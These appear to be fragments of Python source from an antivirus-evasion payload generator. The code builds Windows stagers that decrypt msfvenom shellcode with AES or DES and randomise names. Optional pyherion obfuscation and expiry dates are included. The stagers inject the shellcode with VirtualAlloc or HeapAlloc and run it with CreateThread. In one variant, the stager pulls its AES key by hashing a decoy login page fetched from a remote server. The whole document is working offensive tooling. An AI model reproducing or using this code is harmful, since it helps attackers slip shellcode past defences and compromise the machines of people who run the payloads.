RandMemoryShell = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() PayloadCode = 'from ctypes import *\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandReverseShell + ' = \"' + Shellcode + '\"\n' PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n' PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += '\t' + RandShellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): if self.required_options["INJECT_METHOD"][0].lower() == "virtual": TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0]) target_html_file = str(TARGET_SERVER.split('/')[-1]) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() # Define Random Variable Names for HTTP functions RandResponse = helpers.randomString() RandHttpKey = helpers.randomString() RandMD5 = helpers.randomString() RandKeyServer = helpers.randomString() RandSleep = helpers.randomString() # Define Random Variable Names for HTML Functions RandHttpstring = helpers.randomString() # Genrate Random HTML code for webserver to host key file f = open(str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file,'w') html_data = """ <!DOCTYPE html> <!--[if IE 8]> <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"> <![endif]--> <!--[if !(IE 8) ]><!--> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head> <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post"> <p> <label for="user_login">Username<br> <input name="log" id="user_login" class="input" size="20" type="text"></label> </p> <p> <label for="user_pass">Password<br> <input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label> </p> <p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p> <p class="submit"> <input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit"> <input name="redirect_to" value="http://www.google.com" type="hidden"> <input name="testcookie" value="1" type="hidden"> </p> </form> <p id="nav"> <a rel="nofollow" href="http://www.google.com">Register</a> | <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a> </p> <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p> </div> <div class="clear"></div> </body></html> """ html_data += '<!--'+ RandHttpstring +'-->' html_data = str(html_data) f.write(html_data) f.close() # encrypt the shellcode and grab the HTTP-Md5-Hex Key from new function (EncodedShellcode, secret) = encryption.encryptAES_http_request(Shellcode, html_data) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'import time\n' PayloadCode += 'import md5\n' PayloadCode += 'from urllib2 import Request, urlopen, URLError\n' # Define Target Server "Key hosting server" PayloadCode += RandKeyServer + ' = ' '"'+ TARGET_SERVER +'"' '\n' PayloadCode += 'while True:\n' PayloadCode += ' try:\n' # Open Target Server with HTTP GET request PayloadCode += ' ' + RandResponse + '= urlopen('+ RandKeyServer +') \n' # Check to see if server returns a 200 code or if not its most likely a 400 code PayloadCode += ' if ' + RandResponse + '.code == 200:\n' # Opening and requesting HTML from Target Server PayloadCode += ' '+ RandHttpKey + ' = urlopen('+ RandKeyServer +').read()\n' PayloadCode += ' '+ RandMD5 +' = md5.new()\n' PayloadCode += ' '+ RandHttpKey + ' = str(' + RandHttpKey + ')\n' # Genrate MD5 hash of HTML on page PayloadCode += ' '+ RandMD5 +'.update('+ RandHttpKey +')\n' # Convert to 16 Byte Hex for AES functions PayloadCode += ' '+ RandHttpKey + ' = '+ RandMD5 +'.hexdigest()\n' # Convert to String for functions PayloadCode += ' '+ RandHttpKey + ' = str('+ RandHttpKey +')\n' # Break out to decryption PayloadCode += ' break\n' # At any point it fails you will be in sleep for supplied time PayloadCode += ' except URLError, e:\n' PayloadCode += ' time.sleep('+ self.required_options["SLEEP_TIME"][0] +')\n' PayloadCode += ' pass\n' # Execute Shellcode inject PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += RandCipherObject + ' = AES.new('+ RandHttpKey +')\n' PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode elif self.required_options["INJECT_METHOD"][0].lower() == "heap": TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0]) target_html_file = str(TARGET_SERVER.split('/')[-1]) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() HeapVar = helpers.randomString() # Define Random Variable Names for HTTP functions RandResponse = helpers.randomString() RandHttpKey = helpers.randomString() RandMD5 = helpers.randomString() RandKeyServer = helpers.randomString() RandSleep = helpers.randomString() # Define Random Variable Names for HTML Functions RandHttpstring = helpers.randomString() # Genrate Random HTML code for webserver to host key file f = open(str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file,'w') html_data = """ <!DOCTYPE html> <!--[if IE 8]> <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"> <![endif]--> <!--[if !(IE 8) ]><!--> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head> <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post"> <p> <label for="user_login">Username<br> <input name="log" id="user_login" class="input" size="20" type="text"></label> </p> <p> <label for="user_pass">Password<br> <input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label> </p> <p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p> <p class="submit"> <input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit"> <input name="redirect_to" value="http://www.google.com" type="hidden"> <input name="testcookie" value="1" type="hidden"> </p> </form> <p id="nav"> <a rel="nofollow" href="http://www.google.com">Register</a> | <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a> </p> <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p> </div> <div class="clear"></div> </body></html> """ html_data += '<!--'+ RandHttpstring +'-->' html_data = str(html_data) f.write(html_data) f.close() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES_http_request(Shellcode, html_data) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'import time\n' PayloadCode += 'import md5\n' PayloadCode += 'from urllib2 import Request, urlopen, URLError\n' # Define Target Server "Key hosting server" PayloadCode += RandKeyServer + ' = ' '"'+ TARGET_SERVER +'"' '\n' PayloadCode += 'while True:\n' PayloadCode += ' try:\n' # Open Target Server with HTTP GET request PayloadCode += ' ' + RandResponse + '= urlopen('+ RandKeyServer +') \n' # Check to see if server returns a 200 code or if not its most likely a 400 code PayloadCode += ' if ' + RandResponse + '.code == 200:\n' # Opening and requesting HTML from Target Server PayloadCode += ' '+ RandHttpKey + ' = urlopen('+ RandKeyServer +').read()\n' PayloadCode += ' '+ RandMD5 +' = md5.new()\n' PayloadCode += ' '+ RandHttpKey + ' = str(' + RandHttpKey + ')\n' # Genrate MD5 hash of HTML on page PayloadCode += ' '+ RandMD5 +'.update('+ RandHttpKey +')\n' # Convert to 16 Byte Hex for AES functions PayloadCode += ' '+ RandHttpKey + ' = '+ RandMD5 +'.hexdigest()\n' # Convert to String for functions PayloadCode += ' '+ RandHttpKey + ' = str('+ RandHttpKey +')\n' # Break out to decryption PayloadCode += ' break\n' # At any point it fails you will be in sleep for supplied time PayloadCode += ' except URLError, e:\n' PayloadCode += ' time.sleep('+ self.required_options["SLEEP_TIME"][0] +')\n' PayloadCode += ' pass\n' # Execute Shellcode inject PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0]) target_html_file = str(TARGET_SERVER.split('/')[-1]) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() # Define Random Variable Names for HTTP functions RandResponse = helpers.randomString() RandHttpKey = helpers.randomString() RandMD5 = helpers.randomString() RandKeyServer = helpers.randomString() RandSleep = helpers.randomString() # Define Random Variable Names for HTML Functions RandHttpstring = helpers.randomString() # Genrate Random HTML code for webserver to host key file f = open(str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file,'w') html_data = """ <!DOCTYPE html> <!--[if IE 8]> <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"> <![endif]--> <!--[if !(IE 8) ]><!--> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head> <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post"> <p> <label for="user_login">Username<br> <input name="log" id="user_login" class="input" size="20" type="text"></label> </p> <p> <label for="user_pass">Password<br> <input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label> </p> <p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p> <p class="submit"> <input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit"> <input name="redirect_to" value="http://www.google.com" type="hidden"> <input name="testcookie" value="1" type="hidden"> </p> </form> <p id="nav"> <a rel="nofollow" href="http://www.google.com">Register</a> | <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a> </p> <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p> </div> <div class="clear"></div> </body></html> """ html_data += '<!--'+ RandHttpstring +'-->' html_data = str(html_data) f.write(html_data) f.close() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES_http_request(Shellcode, html_data) # Create Payload code PayloadCode = 'from ctypes import *\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'import time\n' PayloadCode += 'import md5\n' PayloadCode += 'from urllib2 import Request, urlopen, URLError\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' # Define Target Server "Key hosting server" PayloadCode += RandKeyServer + ' = ' '"'+ TARGET_SERVER +'"' '\n' PayloadCode += 'while True:\n' PayloadCode += ' try:\n' # Open Target Server with HTTP GET request PayloadCode += ' ' + RandResponse + '= urlopen('+ RandKeyServer +') \n' # Check to see if server returns a 200 code or if not its most likely a 400 code PayloadCode += ' if ' + RandResponse + '.code == 200:\n' # Opening and requesting HTML from Target Server PayloadCode += ' '+ RandHttpKey + ' = urlopen('+ RandKeyServer +').read()\n' PayloadCode += ' '+ RandMD5 +' = md5.new()\n' PayloadCode += ' '+ RandHttpKey + ' = str(' + RandHttpKey + ')\n' # Genrate MD5 hash of HTML on page PayloadCode += ' '+ RandMD5 +'.update('+ RandHttpKey +')\n' # Convert to 16 Byte Hex for AES functions PayloadCode += ' '+ RandHttpKey + ' = '+ RandMD5 +'.hexdigest()\n' # Convert to String for functions PayloadCode += ' '+ RandHttpKey + ' = str('+ RandHttpKey +')\n' # Break out to decryption PayloadCode += ' break\n' # At any point it fails you will be in sleep for supplied time PayloadCode += ' except URLError, e:\n' PayloadCode += ' time.sleep('+ self.required_options["SLEEP_TIME"][0] +')\n' PayloadCode += ' pass\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n' PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): if self.required_options["inject_method"][0].lower() == "virtual": if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandDESKey = helpers.randomString() RandDESPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode) # Create Payload File PayloadCode = "from Crypto.Cipher import DES\n" PayloadCode += "import ctypes as avlol\n" PayloadCode += RandIV + " = '" + iv + "'\n" PayloadCode += RandDESKey + " = '" + DESKey + "'\n" PayloadCode += RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n" PayloadCode += RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n" PayloadCode += ( ShellcodeVariableName + " = bytearray(" + RandDESPayload + ".decrypt(" + RandEncShellCodePayload + ").decode('string_escape'))\n" ) PayloadCode += ( RandPtr + " = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(" + ShellcodeVariableName + ")),avlol.c_int(0x3000),avlol.c_int(0x40))\n" ) PayloadCode += ( RandBuf + " = (avlol.c_char * len(" + ShellcodeVariableName + ")).from_buffer(" + ShellcodeVariableName + ")\n" ) PayloadCode += ( "avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(" + RandPtr + ")," + RandBuf + ",avlol.c_int(len(" + ShellcodeVariableName + ")))\n" ) PayloadCode += ( RandHt + " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(" + RandPtr + "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n" ) PayloadCode += "avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))" if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandDESKey = helpers.randomString() RandDESPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode) # Create Payload File PayloadCode = "from Crypto.Cipher import DES\n" PayloadCode += "import ctypes as avlol\n" PayloadCode += "from datetime import datetime\n" PayloadCode += "from datetime import date\n\n" PayloadCode += RandToday + " = datetime.now()\n" PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n' PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n" PayloadCode += "\t" + RandIV + " = '" + iv + "'\n" PayloadCode += "\t" + RandDESKey + " = '" + DESKey + "'\n" PayloadCode += "\t" + RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n" PayloadCode += "\t" + RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n" PayloadCode += ( "\t" + ShellcodeVariableName + " = bytearray(" + RandDESPayload + ".decrypt(" + RandEncShellCodePayload + ").decode('string_escape'))\n" ) PayloadCode += ( "\t" + RandPtr + " = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(" + ShellcodeVariableName + ")),avlol.c_int(0x3000),avlol.c_int(0x40))\n" ) PayloadCode += ( "\t" + RandBuf + " = (avlol.c_char * len(" + ShellcodeVariableName + ")).from_buffer(" + ShellcodeVariableName + ")\n" ) PayloadCode += ( "\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(" + RandPtr + ")," + RandBuf + ",avlol.c_int(len(" + ShellcodeVariableName + ")))\n" ) PayloadCode += ( "\t" + RandHt + " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(" + RandPtr + "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n" ) PayloadCode += ( "\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))" ) if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode if self.required_options["inject_method"][0].lower() == "heap": if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandDESKey = helpers.randomString() RandDESPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() HeapVar = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode) # Create Payload File PayloadCode = "from Crypto.Cipher import DES\n" PayloadCode += "import ctypes as avlol\n" PayloadCode += RandIV + " = '" + iv + "'\n" PayloadCode += RandDESKey + " = '" + DESKey + "'\n" PayloadCode += RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n" PayloadCode += RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n" PayloadCode += ( ShellcodeVariableName + " = bytearray(" + RandDESPayload + ".decrypt(" + RandEncShellCodePayload + ").decode('string_escape'))\n" ) PayloadCode += ( HeapVar + " = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(" + ShellcodeVariableName + ") * 2),avlol.c_int(0))\n" ) PayloadCode += ( RandPtr + " = avlol.windll.kernel32.HeapAlloc(avlol.c_int(" + HeapVar + "),avlol.c_int(0x00000008),avlol.c_int(len( " + ShellcodeVariableName + ")))\n" ) PayloadCode += ( RandBuf + " = (avlol.c_char * len(" + ShellcodeVariableName + ")).from_buffer(" + ShellcodeVariableName + ")\n" ) PayloadCode += ( "avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(" + RandPtr + ")," + RandBuf + ",avlol.c_int(len(" + ShellcodeVariableName + ")))\n" ) PayloadCode += ( RandHt + " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(" + RandPtr + "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n" ) PayloadCode += "avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))" if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandDESKey = helpers.randomString() RandDESPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() HeapVar = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode) # Create Payload File PayloadCode = "from Crypto.Cipher import DES\n" PayloadCode += "import ctypes as avlol\n" PayloadCode += "from datetime import datetime\n" PayloadCode += "from datetime import date\n\n" PayloadCode += RandToday + " = datetime.now()\n" PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n' PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n" PayloadCode += "\t" + RandIV + " = '" + iv + "'\n" PayloadCode += "\t" + RandDESKey + " = '" + DESKey + "'\n" PayloadCode += "\t" + RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n" PayloadCode += "\t" + RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n" PayloadCode += ( "\t" + ShellcodeVariableName + " = bytearray(" + RandDESPayload + ".decrypt(" + RandEncShellCodePayload + ").decode('string_escape'))\n" ) PayloadCode += ( "\t" + HeapVar + " = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(" + ShellcodeVariableName + ") * 2),avlol.c_int(0))\n" ) PayloadCode += ( "\t" + RandPtr + " = avlol.windll.kernel32.HeapAlloc(avlol.c_int(" + HeapVar + "),avlol.c_int(0x00000008),avlol.c_int(len( " + ShellcodeVariableName + ")))\n" ) PayloadCode += ( "\t" + RandBuf + " = (avlol.c_char * len(" + ShellcodeVariableName + ")).from_buffer(" + ShellcodeVariableName + ")\n" ) PayloadCode += ( "\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(" + RandPtr + ")," + RandBuf + ",avlol.c_int(len(" + ShellcodeVariableName + ")))\n" ) PayloadCode += ( "\t" + RandHt + " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(" + RandPtr + "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n" ) PayloadCode += ( "\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))" ) if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandDESKey = helpers.randomString() RandDESPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode) # Create Payload File PayloadCode = "from Crypto.Cipher import DES\n" PayloadCode += "from ctypes import *\n" PayloadCode += RandIV + " = '" + iv + "'\n" PayloadCode += RandDESKey + " = '" + DESKey + "'\n" PayloadCode += RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n" PayloadCode += RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n" PayloadCode += ( ShellcodeVariableName + " = " + RandDESPayload + ".decrypt(" + RandEncShellCodePayload + ").decode('string_escape')\n" ) PayloadCode += ( RandMemoryShell + " = create_string_buffer(" + ShellcodeVariableName + ", len(" + ShellcodeVariableName + "))\n" ) PayloadCode += RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n" PayloadCode += RandShellcode + "()" if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandDESKey = helpers.randomString() RandDESPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode) # Create Payload File PayloadCode = "from Crypto.Cipher import DES\n" PayloadCode += "from ctypes import *\n" PayloadCode += "from datetime import datetime\n" PayloadCode += "from datetime import date\n\n" PayloadCode += RandToday + " = datetime.now()\n" PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n' PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n" PayloadCode += "\t" + RandIV + " = '" + iv + "'\n" PayloadCode += "\t" + RandDESKey + " = '" + DESKey + "'\n" PayloadCode += "\t" + RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n" PayloadCode += "\t" + RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n" PayloadCode += ( "\t" + ShellcodeVariableName + " = " + RandDESPayload + ".decrypt(" + RandEncShellCodePayload + ").decode('string_escape')\n" ) PayloadCode += ( "\t" + RandMemoryShell + " = create_string_buffer(" + ShellcodeVariableName + ", len(" + ShellcodeVariableName + "))\n" ) PayloadCode += "\t" + RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n" PayloadCode += "\t" + RandShellcode + "()" if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
